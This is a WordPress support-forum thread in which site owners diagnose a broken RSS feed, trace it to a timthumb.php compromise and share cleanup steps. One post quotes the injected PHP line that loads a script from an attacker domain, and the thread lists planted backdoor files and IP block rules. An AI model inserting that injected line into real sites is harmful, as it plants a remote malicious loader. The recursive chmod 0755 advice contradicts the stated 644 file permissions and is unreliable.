WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] RSS Feed Crash (20 posts)

  1. quickfixsports
    Member
    Posted 2 years ago #

    My RSS feed was fine up until today. For some reason it is not working. The only thing i can think of is i removed the feed from HootSuite because it was posting the feed to my Twitter and FB.

    If i plug in http://www.quickfixsports.com/wp-feed.php i see my feed, but not my last post. It also gives me this error message "This feed contains errors. Internet Explorer will try updating this feed again later"

    My FeedBurner is alo not working properly (http://feeds.feedburner.com/QuickFixSports)

    When i try a feed validator i get this message:

    "Sorry this feed does not validate.

    line 599, column 0: XML parsing error: <unknown>:599:0: junk after document element [help]

    <script language="javascript" SRC="http://superpuperdomain.com/count.php?ref ...

    In addition, interoperability with the widest range of feed readers could be improved by implementing the following recommendation.

    line 159, column 0: content:encoded should not contain object tag [help]

    <p><object width="500" height="400"><param name="movie" value="http://www.yo ...

    Source: http://www.quickfixsports.com/feed/

    Please help me fix my feed please...uhg.

    http://www.quickfixsports.com

  2. tannuzzocopywriting
    Member
    Posted 2 years ago #

    Just saw this on both of my sites. How do I delete this line of code?

  3. tannuzzocopywriting
    Member
    Posted 2 years ago #

    Got it! That line of code can be found in the root file of your domain host. Edit the index.php file and you should see it in the last line of code. Delete the line then save it and your RSS should be back up. Worked on both of my sites. Good luck!

  4. girlgonegeekblog
    Member
    Posted 2 years ago #

    Same thing happened to mine! Your post helped me out. Thanks!

    http://www.girlgonegeekblog.com
    feed://feeds.feedburner.com/girlgonegeekblog

  5. OceansDB
    Member
    Posted 2 years ago #

    Hello,

    I have/had a similar problem, not with my rss though.

    You should read the following about superpuperdomain.com

    What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

    Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

    I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.
    I scoured the Internet and finally found a fix.

    First, in your WordPress’s index.php, remove the following script added by the hack:

    echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

    Then remove two phony files added by the hackers (back up first, in case your installation actually requires these files):

    /wp-admin/js/config.php
    /wp-admin/common.php

    Do not try to open any of these files, as my antivirus sounded alarms immediately.

    I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

    To increase your site’s security, make sure you have correct permissions for files and directories.

    Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

    Run this bash command to set the correct permissions recursively for your WordPress installation:

    chmod -R 0755 /wordpressdirectory

    I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

    order allow,deny
    deny from 91.220
    allow from all

    The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

    Source: Techspheria

    http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/

    Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php.... Just in case ;-)

  6. quickfixsports
    Member
    Posted 2 years ago #

    Wow! Very useful stuff...i did exactly what you said and it worked. Thank you. I even deleated the hackers files.

    My question now is how do i prevent this from happening again?

  7. OceansDB
    Member
    Posted 2 years ago #

    There is another file in wp-content called udp.php.

    I think just ban the IP range and do a backtrack on the website to get the direct IP adress, and ban it as well. Just in case.

    If you updated your timtumb.php, they can't place anything else on your website.

  8. debajyoti
    Member
    Posted 2 years ago #

    IGIT Related Posts With Thumb Image After Posts is the plugin which is causing this. I have seen the same as @OceansDB earlier. More details here

  9. WPsites
    Member
    Posted 2 years ago #

    If you have fallen to this timthumb.php hack you need to make sure you have a good look through all your files for any files that have been modified in the last couple of weeks.

    udp.php will more than likely be present in a number of locations. The hacker will have placed a number backdoors not just udp.php.

    Check all recently modified files! otherwise they will just get back in.

  10. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

  11. Hudson Atwell
    Member
    Posted 2 years ago #

    This thread was a huge help! Thank you! I'd like to know what plugin the hacker came in on. This recently happened to me.

  12. curvynerd
    Member
    Posted 2 years ago #

    Thank you @OceansDB -- your guide was a HUGE help! I got bit by this one too. By chance, can anyone recommend a related posts thumb plugin by a more reliable developer? I liked the function of the plugin... just don't want the hack :)

  13. OceansDB
    Member
    Posted 2 years ago #

    @everybody please don't forget to delete the phony files as well.

    There are 6 now:

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-admin/udp.php
    /wp-content/udp.php
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    A new domain popped up, so you have to change your .htaccess (not inside public_html) and replace the lines with this:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all
  14. ed
    Member
    Posted 2 years ago #

    I updated my timthumb.php and deleted the above @oceansDB suggestions files...what else should I do?

  15. OceansDB
    Member
    Posted 2 years ago #

    Make yourselve a nice .htaccess file. Do you have a ban plugin for wordpress? If yes, ban the ip + ip range.

  16. OceansDB
    Member
    Posted 2 years ago #

    I filed a complaint at superpuperdomain.com's registrar with some additional information and a virus report. I am very pleased to let y'all know the domain has been suspended :)

  17. mv5869
    Member
    Posted 2 years ago #

    10 of my websites were infected. Serious pain. It took me the best part of the day to get them cleaned, change all the passwords and disable tomthumb.

    In my case it was because I was using the Suffusion theme, an older version of it, which includes tomthumb.

    I never had the pop-up message asking for my password. But my wp-config files did have a whole load of extra lines added to them. Could they read my password from the wp-config file if they were able to write to it?

  18. jmillgraphics
    Member
    Posted 2 years ago #

    THANK YOU

  19. OceansDB
    Member
    Posted 2 years ago #

    Okay... Now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru....

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?

Topic Closed

This topic has been closed to new replies.

About this Topic